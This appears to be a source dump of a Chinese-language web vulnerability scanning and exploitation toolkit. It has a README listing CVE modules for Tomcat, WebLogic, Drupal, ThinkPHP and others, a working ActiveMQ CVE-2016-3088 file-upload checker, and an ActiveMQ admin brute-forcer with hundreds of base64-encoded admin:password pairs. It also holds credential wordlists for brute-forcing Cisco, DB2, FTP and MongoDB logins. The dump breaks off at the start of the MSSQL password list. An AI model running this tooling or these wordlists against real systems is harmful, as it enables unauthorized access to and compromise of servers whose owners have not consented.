├── .gitignore ├── .vscode └── settings.json ├── README.md ├── activemq_vuln ├── ActiveMQ_uploadfile_cve_2016_3088.py ├── Activemq_weakpasswd.py ├── Main_activemq.py └── __init__.py ├── bf_dicts ├── CISCO-equitment-passwd.txt ├── DB2-passwd.txt ├── DB2-user.txt ├── FTP-passwd.txt ├── FTP-user.txt ├── MONGODB-passwd.txt ├── MONGODB-user.txt ├── Main_bf.py ├── Microsoft_SQL_Server-passwd.txt ├── Microsoft_SQL_Server-user.txt ├── MySQL-passwd.txt ├── MySQL-user.txt ├── ORACLE-passwd.txt ├── ORACLE-user.txt ├── POP3-passwd.txt ├── POP3-user.txt ├── RDP-passwd.txt ├── RDP-user.txt ├── SMB-passwd.txt ├── SMB-user.txt ├── SNMPpasswd.txt ├── SSH-passwd.txt ├── SSH-user.txt ├── SYBASE-passwd.txt ├── SYBASE-user.txt ├── TELNET-passwd.txt ├── TELNET-user.txt ├── TOMCAT-passwd.txt ├── TOMCAT-user.txt ├── __init__.py ├── bf.py ├── 通用-常见口令列表.txt └── 通用-常见用户名列表.txt ├── docker_vuln ├── Main_docker.py ├── __init__.py └── docker_daemon_api.py ├── durpal ├── CVE_2014_3704.py ├── CVE_2018_7600.py ├── Main_durpal.py └── __init__.py ├── fckeditor ├── Main_fckeditor.py ├── __init__.py ├── fckeditor_dangerfile.py ├── fckeditor_getshell.py ├── fckeditor_version.py └── shell.asa ├── gatepass_vuln ├── Gate_Pass_Management_System_login_SQL_Injection.py ├── Main_gatepass.py └── __init__.py ├── iis ├── Main_iis.py ├── __init__.py └── iis_shortname_Scan.py ├── jboss ├── Main_jboss.py ├── __init__.py ├── _exploits.py ├── _updates.py └── jexboss.py ├── js_find ├── Main_js_find.py ├── __init__.py └── js_find.py ├── kindeditor ├── Main_kindeditor.py ├── __init__.py └── kindeditor_under_4_1_5_fileupload.py ├── memcache_vuln ├── Main_memcache_vuln.py ├── __init__.py └── memcache_un.py ├── moon.py ├── navigate_vuln ├── 88.php ├── Main_navigate.py ├── __init__.py └── navigate_Unauthenticated_Remote_Code_Execution_CVE_2018_17553.py ├── redis_vuln ├── Main_redis.py ├── __init__.py └── redis_unauthorized.py ├── requirements.txt ├── search_exploits ├── Main_search_exploits.py ├── __init__.py └── 
search_exploit.py ├── spring_vuln ├── CVE_2018_1273.py ├── Main_spring.py └── __init__.py ├── thinkphp ├── Main_thinkphp.py ├── __init__.py ├── thinkphp5_inj_info.py ├── thinkphp5_x_rce.py └── thinkphp_before5_0_23_rce.py ├── tomcat ├── CVE_2017_12615.py ├── CVE_2017_12617.py ├── CVE_2020_1938.py ├── Main_tomcat.py ├── __init__.py ├── example_vulnerability.py └── tomcat_weakpasswd.py ├── weblogic ├── CNVD_C_2019_48814.py ├── CVE_2017_10271.py ├── CVE_2017_3506.py ├── CVE_2018_2628.py ├── CVE_2019_2725.py ├── Common_page.py ├── Main_weblogic.py ├── __init__.py ├── ssrf.py └── weblogic_weakpasswd.py └── zabbix_vuln ├── Authentication_Bypass.py ├── Main_zabbix.py ├── __init__.py └── zabbix_sql_CVE_2016_10134.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | 3 | __pycache__/ 4 | 5 | *.py[cod] 6 | 7 | *$py.class 8 | 9 | *.xml 10 | *.iml 11 | *.log 12 | .vscode/settings.json 13 | -------------------------------------------------------------------------------- /.vscode/settings.json: -------------------------------------------------------------------------------- 1 | { 2 | "python.linting.flake8Enabled": true, 3 | "python.linting.pylintEnabled": false, 4 | "python.linting.enabled": true, 5 | "python.pythonPath": "C:\\python3\\python.exe" 6 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # vulnerability-list 2 | 3 | 常见漏洞快速检测,目前包含以下漏洞的检测。 4 | 测试环境为win10,python3。 5 | 使用前需安装相关库:py -3 -m pip install -r requirements.txt 6 | 有问题可提issues,最好附上报错截图。 7 | 8 | 已发现的BUG: 9 | 10 | 1. 有些漏洞的判断依据为网页返回信息,但部分网站设置了统一的错误页面,如统一的404页面,因此造成误报。后续针对此类问题通用的解决方式是显示返回页面的大小。 11 | 2. 
有些地方有渣渣的硬编码,比如路径什么的,导致不同环境下可能会报错,遇到这样的问题,使用单独的脚本进行测试,或者自己改一下路径,有时间的话会处理一下。 12 | 13 | ## Tomcat 14 | 15 | - CVE_2017_12615 / CVE_2017_12617 16 | - tomcat_weakpassword 17 | - example_vulnerability(检测tomcat的examples等目录是否存在) 18 | - CNVD-C-2019-48814/CVE-2020-1938 #Apache Tomcat文件包含 参考: 19 | 20 | > moon.py -u tomcat 21 | 22 | ## Fckeditor 23 | 24 | - 获取版本及常见上传页面检测 25 | - fck<=2.4版本直接上传asa文件getshell 26 | 27 | > moon.py -u fck 28 | 29 | ## Weblogic 30 | 31 | - CVE_2017_10271 # 利用方法参考: 32 | - weblogic_ssrf_cve-2014-4210 33 | - weblogic_weakpassword 34 | - CVE-2018-2628 # Author:xxlegend 35 | - CNVD-C-2019-48814 36 | - CVE-2019-2725 # 参考: 37 | 38 | > moon.py -u weblogic 39 | 40 | ## IP归属查询 41 | 42 | - 能简单查一下IP的归属地 43 | 44 | > moon.py -u ip 45 | 46 | ## IIS 47 | 48 | - 短文件名泄露 #来自 lijiejie/IIS_shortname_Scanner 49 | 50 | > moon.py -u iis 51 | 52 | ## Docker 53 | 54 | - docker_daemon_api未授权访问 55 | 56 | > moon.py -u docker 57 | 58 | ## Redis 59 | 60 | - redis未授权访问 61 | 62 | > moon.py -u redis or moon.py -u redis xx.xx.xx.xx:xxxx 63 | 64 | ## Zabbix 65 | 66 | - zabbix_sql_CVE_2016_10134 #有参考独自等待的脚本 67 | 68 | > moon.py -u zabbix 69 | 70 | ## Navigate 71 | 72 | - navigate_Unauthenticated_Remote_Code_Execution #利用方法参考 73 | 74 | > moon.py -u navigate 75 | 76 | ## Gatepass 77 | 78 | - Gate Pass Management System 2.1 - 'login' SQL Injection # 参考 79 | 80 | > moon.py -u gatepass 81 | 82 | ## Jboss 83 | 84 | - admin-console 85 | - Checking Struts2 86 | - Checking Servlet Deserialization 87 | - Checking Application Deserialization 88 | - Checking Jenkins 89 | - Checking web-console 90 | - Checking jmx-console 91 | - JMXInvokerServlet 92 | - 此模块调用的是 # jexboss 使用此模块时,建议在微软新推出的terminal中使用,或者直接下载jexboss进行测试 93 | 94 | > moon.py -u jboss 95 | 96 | ## Kindeditor 97 | 98 | - kindeditor<=4.1.5文件上传漏洞 99 | 100 | > moon.py -u kindeditor 101 | 102 | ## Drupal 103 | 104 | - Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704) 105 | - Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600) # 106 | 107 | > moon.py 
-u drupal 108 | 109 | ## Thinkphp 110 | 111 | - thinkphp_before5_0_23_rce 112 | - thinkphp5_inj_info 113 | - thinkphp5_x_rce 114 | 115 | > moon.py -u thinkphp 116 | 117 | ## Memcache 118 | 119 | - 未授权访问 120 | 121 | > moon.py -u memcache 122 | 123 | ## Js 124 | 125 | - js代码中敏感信息收集 # 主要参考 By Threezh1 126 | 127 | > moon.py -u js 128 | 129 | ## search_exploits 130 | 131 | - 在 exploitalert 中搜索某中间件存在的历史漏洞 132 | 133 | > moon.py -u exploits xxxxxx 134 | 135 | ![search_exploits](https://raw.githubusercontent.com/1120362990/Paper/master/images/vulnerability-list-images/search_exploits.png) 136 | 137 | ## ActiveMQ 138 | 139 | - activemq管理后台弱口令检测 140 | - CVE-2016-3088 activemq文件上传测试,这里只测试文件上传这个步骤,后续的MOVE操作请自行测试 141 | 142 | > moon.py -u activemq 143 | 144 | 请勿用于违法行为,后果自负。 145 | -------------------------------------------------------------------------------- /activemq_vuln/ActiveMQ_uploadfile_cve_2016_3088.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | import string 4 | from random import * 5 | import time 6 | 7 | 8 | ''' 9 | Usage: 10 | moon.py -u activemq http://xx.xx.xx.xx:xxxx 11 | CVE-2016-3088 12 | 影响范围:Apache ActiveMQ 5.0.0 - 5.13.2 在5.12.x~5.13.x已默认关闭 5.14彻底删除相关文件 13 | 简介:ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷。在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以在conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。 14 | 漏洞原理:ActiveMQ 中的 FileServer 服务允许用户通过 HTTP PUT 方法上传文件到指定目录,构造PUT请求上传 webshell 到 fileserver 目录,然后通过 Move 方法将其移动到有执行权限的 admin/ 目录。这里移动文件需要具有相关权限,因此要想拿shel需要有activemq的账户和密码。 15 | 这里只测试上传这一步看看是否可行 16 | ''' 17 | 18 | def attack(URL): 19 | print('[+]开始检测-ActiveMQ任意文件写入漏洞(CVE-2016-3088)。[+]') 20 | filename = gen_shell() 21 | url = URL + '/fileserver/'+filename+'.txt' 22 | user_agent="Mozilla/5.0 (Windows NT 
10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 23 | headers={"User-Agent":user_agent} 24 | data="""CVE-2016-3088-file_upload_test""" 25 | try: 26 | requests.put(url, headers=headers, data=data) 27 | time.sleep(2) 28 | verify_response = requests.get(url, headers=headers) 29 | if verify_response.status_code == 200 and 'CVE-2016-3088-file_upload_test' in verify_response.text: 30 | print('文件上传成功!!!') 31 | print('上传文件地址: ' + url) 32 | else : 33 | print('访问上传文件地址:'+verify_response.status_code) 34 | print("未能成功上传文件。") 35 | except : 36 | print("未发现-ActiveMQ任意文件写入漏洞(CVE-2016-3088)。") 37 | print('[+]检测结束-ActiveMQ任意文件写入漏洞(CVE-2016-3088)。[+]') 38 | print('\n') 39 | def gen_shell(): 40 | min_char = 4 41 | max_char = 12 42 | allchar = string.ascii_letters + string.digits 43 | shell_name = "".join(choice(allchar) for x in range(randint(min_char, max_char))) 44 | return shell_name 45 | 46 | 47 | if __name__ == "__main__": 48 | attack() 49 | -------------------------------------------------------------------------------- /activemq_vuln/Activemq_weakpasswd.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | import base64 4 | 5 | ''' 6 | Usage: 7 | moon.py -u activemq http://xx.xx.xx.xx:xxxx 8 | http://xx.xx.xx.xx:8161/admin/ 弱口令 admin admin 9 | ''' 10 | 11 | def attack(URL): 12 | print('[+]开始检测-ActiveMQ弱口令。[+]') 13 | url = URL +'/admin' 14 | user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 15 | headers={"User-Agent":user_agent} 16 | passwords = ['YWRtaW46IUAjJCVeJio=', 'YWRtaW46IUAjJCVeJg==', 'YWRtaW46IUAjJCVe', 'YWRtaW46IUAjJCU=', 'YWRtaW46IUAjJA==', 'YWRtaW46QCMkJV4m', 'YWRtaW46MA==', 'YWRtaW46MDAwMDAw', 'YWRtaW46MDAwMDAwYQ==', 'YWRtaW46MTAwMjAw', 'YWRtaW46MTAxMDEw', 'YWRtaW46MTEwMTEw', 'YWRtaW46MTEwMTIw', 'YWRtaW46MTEwMTIwMTE5', 'YWRtaW46MTExMTE=', 'YWRtaW46MTExMTEx', 
'YWRtaW46MTExMTExMQ==', 'YWRtaW46MTExMTExMTE=', 'YWRtaW46MTExMTExMTEx', 'YWRtaW46MTExMTExMTExMQ==', 'YWRtaW46MTExMTExYQ==', 'YWRtaW46MTExMjIy', 'YWRtaW46MTEyMjMz', 'YWRtaW46MTEyMjMzNDQ=', 'YWRtaW46MTEyMzU4MTMyMQ==', 'YWRtaW46MTIxMjEy', 'YWRtaW46MTIxMjEyMTI=', 'YWRtaW46MTIz', 'YWRtaW46MTIzMDAw', 'YWRtaW46MTIzMTIz', 'YWRtaW46MTIzMTIzMTIz', 'YWRtaW46MTIzMTIzYQ==', 'YWRtaW46MTIzMzIx', 'YWRtaW46MTIzNA==', 'YWRtaW46MTIzNDQzMjE=', 'YWRtaW46MTIzNDU=', 'YWRtaW46MTIzNDU1NDMyMQ==', 'YWRtaW46MTIzNDU2Li4=', 'YWRtaW46MTIzNDU2', 'YWRtaW46MTIzNDU2Nw==', 'YWRtaW46MTIzNDU2Nzg=', 'YWRtaW46MTIzNDU2Nzg5Li4=', 'YWRtaW46MTIzNDU2Nzg5', 'YWRtaW46MTIzNDU2Nzg5MA==', 'YWRtaW46MTIzNDU2Nzg5MDA=', 'YWRtaW46MTIzNDU2Nzg5MQ==', 'YWRtaW46MTIzNDU2Nzg5MTA=', 'YWRtaW46MTIzNDU2Nzg5OQ==', 'YWRtaW46MTIzNDU2Nzg5YQ==', 'YWRtaW46MTIzNDU2Nzg5YWJj', 'YWRtaW46MTIzNDU2Nzg5cQ==', 'YWRtaW46MTIzNDU2Nzg5cXE=', 'YWRtaW46MTIzNDU2YQ==', 'YWRtaW46MTIzNDU2YWE=', 'YWRtaW46MTIzNDU2YUFA', 'YWRtaW46MTIzNDU2YWJj', 'YWRtaW46MTIzNDU2YXNk', 'YWRtaW46MTIzNDU2cQ==', 'YWRtaW46MTIzNDU2cXE=', 'YWRtaW46MTIzNDVh', 'YWRtaW46MTIzNHF3ZXI=', 'YWRtaW46MTIzNjU0', 'YWRtaW46MTIzNjU0Nzg5', 'YWRtaW46MTIzNjk4NzQ1', 'YWRtaW46MTIzYWJj', 'YWRtaW46MTIzcXdl', 'YWRtaW46MTIzcXdlYXNk', 'YWRtaW46MTIzJHF3ZVI=', 'YWRtaW46MTJxd2Fzeng=', 'YWRtaW46MTMxMzEz', 'YWRtaW46MTMxNDUyMA==', 'YWRtaW46MTMxNDUyMDUyMA==', 'YWRtaW46MTMxNDUyMQ==', 'YWRtaW46MTM1NzkyNDY4', 'YWRtaW46MTM1NzkyNDY4MA==', 'YWRtaW46MTQ3MjU4', 'YWRtaW46MTQ3MjU4MzY5', 'YWRtaW46MTQ3MjU4MzY5MA==', 'YWRtaW46MTU5MzU3', 'YWRtaW46MTU5NzUz', 'YWRtaW46MTYzLmNvbQ==', 'YWRtaW46MTY4MTY4', 'YWRtaW46MUEyQjNDNEQ=', 'YWRtaW46MWcydzNlNHI=', 'YWRtaW46MSBvciAxPTE=', 'YWRtaW46MScgb3IgJzEnPScx', 'YWRtaW46MSIgb3IgIjEiPSIx', 'YWRtaW46MScgb3JkZXIgYnkgMS0t', 'YWRtaW46MScgb3JkZXIgYnkgMTAtLQ==', 'YWRtaW46MXAybzNp', 'YWRtaW46MXEydzNl', 'YWRtaW46MXEydzNlNHI=', 'YWRtaW46MXEydzNlNHI1dA==', 'YWRtaW46MXFhejJ3c3g=', 'YWRtaW46MXFheiFRQVo=', 'YWRtaW46MXFhekBXU1g=', 'YWRtaW46MXFhenhzdzI=', 'YWRtaW46MjIyMjIy', 'YWRtaW46MjIyMjIyMg==', 
'YWRtaW46MjIyMjIyMjI=', 'YWRtaW46MzE0MTU5MjY=', 'YWRtaW46MzMzMzMz', 'YWRtaW46M2VkYyRSRlY=', 'YWRtaW46NDU2ODUy', 'YWRtaW46NTIwMTMxNA==', 'YWRtaW46NTIwMTMxNDUyMA==', 'YWRtaW46NTIwMTMxNGE=', 'YWRtaW46NTIwNTIw', 'YWRtaW46NTIxMTMxNA==', 'YWRtaW46NTIxNTIx', 'YWRtaW46NTU1NTU1', 'YWRtaW46NTU1NTU1NTU=', 'YWRtaW46NTg0MTMxNDUyMA==', 'YWRtaW46NTg0NTIw', 'YWRtaW46NTg0NTIwMTMxNA==', 'YWRtaW46NjU0MzIx', 'YWRtaW46NjY2NjY2', 'YWRtaW46NjY2ODg4', 'YWRtaW46NzQxODUyOTYz', 'YWRtaW46NzUzOTUx', 'YWRtaW46Nzc1ODI1OA==', 'YWRtaW46Nzc1ODUyMQ==', 'YWRtaW46Nzc3Nzc3', 'YWRtaW46Nzc3Nzc3Nw==', 'YWRtaW46Nzc3Nzc3Nzc=', 'YWRtaW46Nzg5NDU2', 'YWRtaW46Nzg5NDU2MTIz', 'YWRtaW46Nzg5NDU2MTIzMA==', 'YWRtaW46NzkwMTE5', 'YWRtaW46ODA0ODY=', 'YWRtaW46ODg4ODg4', 'YWRtaW46ODg4ODg4ODg=', 'YWRtaW46ODg4OTk5', 'YWRtaW46OTYwNjI4', 'YWRtaW46OTg3NjU0', 'YWRtaW46OTg3NjU0MzIx', 'YWRtaW46OTg3NjU0MzIxMA==', 'YWRtaW46OTk5OTk5', 'YWRtaW46OTk5OTk5OTk=', 'YWRtaW46OTk5OTk5OTk5', 'YWRtaW46YTAwMDAwMA==', 'YWRtaW46YTExMTExMQ==', 'YWRtaW46YTEyMzEyMw==', 'YWRtaW46YTEyMzMyMQ==', 'YWRtaW46YTEyMzQ1', 'YWRtaW46YTEyM180NTY=', 'YWRtaW46YTEyMzQ1Ng==', 'YWRtaW46YTEyMzQ1Njc4', 'YWRtaW46YTEyMzQ1Njc4OQ==', 'YWRtaW46YTFiMmMz', 'YWRtaW46YTUyMDEzMTQ=', 'YWRtaW46QWFAMTIzNDU=', 'YWRtaW46QWFAMTIzNDU2', 'YWRtaW46QWExMjM0NTYh', 'YWRtaW46QWExMjM0NTYu', 'YWRtaW46QWExMjM0NTY=', 'YWRtaW46QWExMjM0NTY3IQ==', 'YWRtaW46YWExMjM0NTY3ODk=', 'YWRtaW46YWFhMTEx', 'YWRtaW46YWFhMTIz', 'YWRtaW46YWFhMTIzNDU2', 'YWRtaW46YWFhYWFh', 'YWRtaW46YWJjMTIz', 'YWRtaW46YWJjMTIzNDU2', 'YWRtaW46YWJjMTIzNDU2Nzg5', 'YWRtaW46YWJjYWJj', 'YWRtaW46YWJjZDEyMw==', 'YWRtaW46YWJjZDEyMzQ=', 'YWRtaW46YWJjZDEyMzQ1Ng==', 'YWRtaW46YWJjZGVm', 'YWRtaW46YWRtaW4=', 'YWRtaW46YWRtaW44ODg=', 'YWRtaW46YWRtaW5pc3RyYXRvcg==', 'YWRtaW46YWluaTEzMTQ=', 'YWRtaW46YXB0eDQ4Njk=', 'YWRtaW46YXMxMjM0NTY=', 'YWRtaW46YXNkMTIz', 'YWRtaW46YXNkMTIzNDU2', 'YWRtaW46YXNkYXNk', 'YWRtaW46YXNkYXNkMTIz', 'YWRtaW46YXNkZg==', 'YWRtaW46YXNkZmdo', 'YWRtaW46YXNkZmdoamts', 'YWRtaW46YmFuZ29uZ3NoaQ==', 'YWRtaW46Y2FvbmltYQ==', 
'YWRtaW46Y2FvbmltYTEyMw==', 'YWRtaW46Y29tcHV0ZXI=', 'YWRtaW46Zm9vdGJhbGw=', 'YWRtaW46ZnVja3lvdQ==', 'YWRtaW46ZnVja3lvdTE=', 'YWRtaW46Z3dlcnR5', 'YWRtaW46Z3dlcnR5MTIz', 'YWRtaW46aGVsbG8xMjM0', 'YWRtaW46aWxvdmV5b3U=', 'YWRtaW46aWxvdmV5b3Ux', 'YWRtaW46bG92ZQ==', 'YWRtaW46bG92ZTEyMw==', 'YWRtaW46bG92ZTEzMTQ=', 'YWRtaW46bXlzcGFjZTE=', 'YWRtaW46bmloYW8xMjM=', 'YWRtaW46bnVsbA==', 'YWRtaW46cGFzc3dk', 'YWRtaW46cGFzc3dvcmQ=', 'YWRtaW46cGFzc3dvcmQx', 'YWRtaW46UGFzc3dvcmQy', 'YWRtaW46UG1zQDEyMzQ=', 'YWRtaW46cHJpbmNlc3M=', 'YWRtaW46cHJpbmNlc3Mx', 'YWRtaW46UEBzc3cwcmQ=', 'YWRtaW46cEBzc3dvcmQ=', 'YWRtaW46cTEyMzQ1Ng==', 'YWRtaW46cTEyMzQ1Njc4OQ==', 'YWRtaW46cTF3MmUz', 'YWRtaW46cTF3MmUzcjQ=', 'YWRtaW46cTF3MkUjUiQ=', 'YWRtaW46UUFaMTIz', 'YWRtaW46cWF6MTIzNDU2', 'YWRtaW46IVFBWjJ3c3g=', 'YWRtaW46cWF6d3N4', 'YWRtaW46cWF6d3N4MTIz', 'YWRtaW46cWF6d3N4ZWRj', 'YWRtaW46IVFBWnhzdzI=', 'YWRtaW46cWF6eHN3MjE=', 'YWRtaW46cXExMjMxMjM=', 'YWRtaW46cXExMjM0NTY=', 'YWRtaW46cXExMjM0NTY3ODk=', 'YWRtaW46cXExMzE0NTIw', 'YWRtaW46cXE1MjAxMzE0', 'YWRtaW46cXdlMTIz', 'YWRtaW46cXdlMTIzNDU2', 'YWRtaW46cXdlYXNk', 'YWRtaW46cXdlcjEyMzQ=', 'YWRtaW46cXdlcnR5', 'YWRtaW46cXdlcnR5MQ==', 'YWRtaW46UXdlcnR5MTI=', 'YWRtaW46cXdlcnR5MTIz', 'YWRtaW46UXdlcnR5MTIzNDU=', 'YWRtaW46cXdlcnR5dWlvcA==', 'YWRtaW46cm9vdA==', 'YWRtaW46cm9vdEBXSlM=', 'YWRtaW46czEyMzQ1Ng==', 'YWRtaW46c3Vuc2hpbmU=', 'YWRtaW46dGFyZ2V0MTIz', 'YWRtaW46dGVzdA==', 'YWRtaW46dGVzdDEyMw==', 'YWRtaW46dGVzdGo=', 'YWRtaW46VXNAMTIzNDU=', 'YWRtaW46dXNlcm5hbWU=', 'YWRtaW46VXNyMTIzNDU=', 'YWRtaW46dzEyMzQ1Ng==', 'YWRtaW46dzEyMzQ1Njc4OQ==', 'YWRtaW46d2FuZzEyMw==', 'YWRtaW46d2FuZzEyMzQ1Ng==', 'YWRtaW46d29haW5p', 'YWRtaW46d29haW5pMTIz', 'YWRtaW46d29haW5pMTMxNA==', 'YWRtaW46d29haW5pMTMxNDUyMA==', 'YWRtaW46d29haW5pNTIw', 'YWRtaW46d29haW5pNTIx', 'YWRtaW46QFdTWGNkZTM=', 'YWRtaW46V3dfMTIzNDU2', 'YWRtaW46d3d3MTIzNDU2', 'YWRtaW46ejEyMzQ1Ng==', 'YWRtaW46ejEyMzQ1Njc4OQ==', 'YWRtaW46emFxMTJ3c3g=', 'YWRtaW46WkFRITJ3c3g=', 'YWRtaW46emhhbmcxMjM=', 'YWRtaW46enhjMTIz', 'YWRtaW46enhjMTIzNDU2', 
'YWRtaW46enhjdmJubQ==', 'YWRtaW46enhjdmJubTEyMw==', 'YWRtaW46VGVzdDEyMyQ=', 'YWRtaW46MXEydzNlNHI1dA=='] 17 | try: 18 | requests.get(url, headers=headers) 19 | verify_response = requests.get(url, headers=headers) 20 | if verify_response.status_code == 401: 21 | print('[*]存在web管理界面,开始爆破:'+url) 22 | for passwd in passwords: 23 | try: 24 | headers={"User-Agent":user_agent,"Authorization":'Basic '+passwd} 25 | verify_response = requests.get(url, headers=headers) 26 | if verify_response.status_code == 200: 27 | print('发现弱口令:'+str(base64.b64decode(passwd), "utf-8")) 28 | break 29 | except Exception: 30 | pass 31 | else: 32 | print('未发现管理页面:'+url) 33 | except Exception: 34 | print("检测错误,未发现漏洞。") 35 | print('[+]检测结束-ActiveMQ弱口令。[+]') 36 | print('\n') 37 | 38 | 39 | if __name__ == "__main__": 40 | attack() 41 | -------------------------------------------------------------------------------- /activemq_vuln/Main_activemq.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import activemq_vuln.ActiveMQ_uploadfile_cve_2016_3088 3 | import activemq_vuln.Activemq_weakpasswd 4 | 5 | 6 | def exec(URL): 7 | activemq_vuln.Activemq_weakpasswd.attack(URL) 8 | activemq_vuln.ActiveMQ_uploadfile_cve_2016_3088.attack(URL) 9 | 10 | 11 | if __name__ == "__main__": 12 | exec() 13 | -------------------------------------------------------------------------------- /activemq_vuln/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /bf_dicts/CISCO-equitment-passwd.txt: -------------------------------------------------------------------------------- 1 | admin 2 | cisco 3 | netadmin 4 | private 5 | 1234 6 | root 7 | super 8 | abc123 9 | router 10 | public 11 | pento 12 | password 13 | 123456 14 | sysadm 15 | default 16 | iloveyou 17 | qq123456 18 | taobao 19 | wang1234 20 | switch 21 | 
backdoor 22 | recovery 23 | secure 24 | anicust 25 | d.e.b.u.g 26 | ADTRAN 27 | installer 28 | surt 29 | NetICs 30 | adminttd 31 | D-Link 32 | tech 33 | private 34 | synnet 35 | adtran 36 | hello 37 | security 38 | guest 39 | smile 40 | support 41 | PASSWORD 42 | changeme2 43 | ascend 44 | netopia 45 | echo 46 | pass 47 | corecess 48 | Manager 49 | secret 50 | BRIDGE 51 | atc123 52 | Password 53 | superuser 54 | 123456 55 | emradmin 56 | 12345678 57 | -------------------------------------------------------------------------------- /bf_dicts/DB2-passwd.txt: -------------------------------------------------------------------------------- 1 | 2 | 123 3 | 123123 4 | 123456 5 | 12345678 6 | !@# 7 | !@#$%^ 8 | !@#$%^&* 9 | 111111 10 | 666666 11 | abc 12 | test 13 | 888888 14 | fgh@#$ 15 | 123321 16 | |+_)( 17 | Admin123 18 | 88888888 19 | 66666666 20 | test123 21 | master 22 | admin 23 | root 24 | 11111111 25 | 000000 26 | 8888 27 | 6666 28 | 123!@# 29 | 00000000 30 | 1234567 31 | aaaaaa 32 | 654321 33 | 999999 34 | 222222 35 | password 36 | abcdefg 37 | woaini 38 | iloveyou 39 | exit 40 | 99999999 41 | 333333 42 | 444444 43 | 555555 44 | 6543210 45 | 111222 46 | asdfghjkl 47 | abc123 48 | 666888 49 | zzzzzz 50 | abcd1234 51 | 1234 52 | 12345 53 | abcd 54 | abcde 55 | abcdef 56 | abcdefg 57 | abcdefgh 58 | abcdefghi 59 | Admin123 60 | 123qwe 61 | qazwsx 62 | qweasd 63 | asdfjkl; 64 | `1234567890-= 65 | 1234567890-= 66 | !@#$%^&*()_+ 67 | ~!@#$%^&*()_+ -------------------------------------------------------------------------------- /bf_dicts/DB2-user.txt: -------------------------------------------------------------------------------- 1 | db2inst1 2 | db2admin 3 | Administrator 4 | db2fenc1 5 | dasusr1 6 | -------------------------------------------------------------------------------- /bf_dicts/FTP-passwd.txt: -------------------------------------------------------------------------------- 1 | pssword 2 | 123 3 | 123123 4 | 123456 5 | 12345678 6 | test 7 | xiaoming 8 | 
!@# 9 | !@#$%^ 10 | !@#$%^&* 11 | 111111 12 | 666666 13 | abc 14 | 888888 15 | qq123456 16 | qwe!@# 17 | taobao 18 | wang1234 19 | qwe!@#123 20 | 123321 21 | |+_)( 22 | Admin123 23 | 88888888 24 | 66666666 25 | 111111 26 | guest 27 | test123 28 | master 29 | admin 30 | root 31 | 11111111 32 | 000000 33 | 8888 34 | 6666 35 | 123!@# 36 | 00000000 37 | 1234567 38 | aaaaaa 39 | 654321 40 | 999999 41 | 222222 42 | password 43 | abcdefg 44 | woaini 45 | iloveyou 46 | exit 47 | 99999999 48 | 333333 49 | 444444 50 | 555555 51 | 999999 52 | 000000 53 | 00000000 54 | 6543210 55 | 111222 56 | asdfghjkl 57 | abc123 58 | 666888 59 | zzzzzz 60 | abcd1234 61 | Guest123 62 | 1234 63 | 12345 64 | ab 65 | abcd 66 | abcde 67 | abcdef 68 | abcdefg 69 | abcdefgh 70 | abcdefghi 71 | Admin123 72 | 123qwe 73 | qazwsx 74 | qweasd 75 | asdfjkl; 76 | `1234567890-= 77 | 1234567890-= 78 | !@#$%^&*()_+ 79 | ~!@#$%^&*()_+ 80 | -------------------------------------------------------------------------------- /bf_dicts/FTP-user.txt: -------------------------------------------------------------------------------- 1 | desc 2 | ftp 3 | root 4 | anonymous 5 | guest 6 | Administrator 7 | user 8 | -------------------------------------------------------------------------------- /bf_dicts/MONGODB-passwd.txt: -------------------------------------------------------------------------------- 1 | 2 | 123 3 | 123123 4 | 123456 5 | 12345678 6 | !@# 7 | !@#$%^ 8 | !@#$%^&* 9 | 111111 10 | 666666 11 | abc 12 | test 13 | 888888 14 | 123321 15 | |+_)( 16 | changeMe 17 | Admin123 18 | testpass 19 | 88888888 20 | 66666666 21 | 111111 22 | guest 23 | test123 24 | master 25 | admin 26 | root 27 | 11111111 28 | 000000 29 | 8888 30 | 6666 31 | 123!@# 32 | 00000000 33 | 1234567 34 | aaaaaa 35 | 654321 36 | 999999 37 | 222222 38 | password 39 | abcdefg 40 | woaini 41 | iloveyou 42 | exit 43 | 99999999 44 | 333333 45 | 444444 46 | 555555 47 | 999999 48 | 000000 49 | 00000000 50 | 6543210 51 | 111222 52 | asdfghjkl 53 | abc123 
54 | 666888 55 | zzzzzz 56 | abcd1234 57 | Guest123 58 | 1234 59 | 12345 60 | ab 61 | abcd 62 | abcde 63 | abcdef 64 | abcdefg 65 | abcdefgh 66 | abcdefghi 67 | Admin123 68 | 123qwe 69 | qazwsx 70 | qweasd 71 | asdfjkl; 72 | `1234567890-= 73 | 1234567890-= 74 | !@#$%^&*()_+ 75 | ~!@#$%^&*()_+ -------------------------------------------------------------------------------- /bf_dicts/MONGODB-user.txt: -------------------------------------------------------------------------------- 1 | admin 2 | root 3 | user 4 | test 5 | accountAdmin01 6 | testuser 7 | accountUser 8 | reportsUser 9 | appAdmin 10 | mongouser 11 | -------------------------------------------------------------------------------- /bf_dicts/Main_bf.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import bf_dicts.bf 3 | 4 | 5 | def exec(service,ip,port): 6 | bf_dicts.bf.attack(service,ip,port) 7 | 8 | if __name__ == "__main__": 9 | exec() 10 | -------------------------------------------------------------------------------- /bf_dicts/Microsoft_SQL_Server-passwd.txt: -------------------------------------------------------------------------------- 1 | 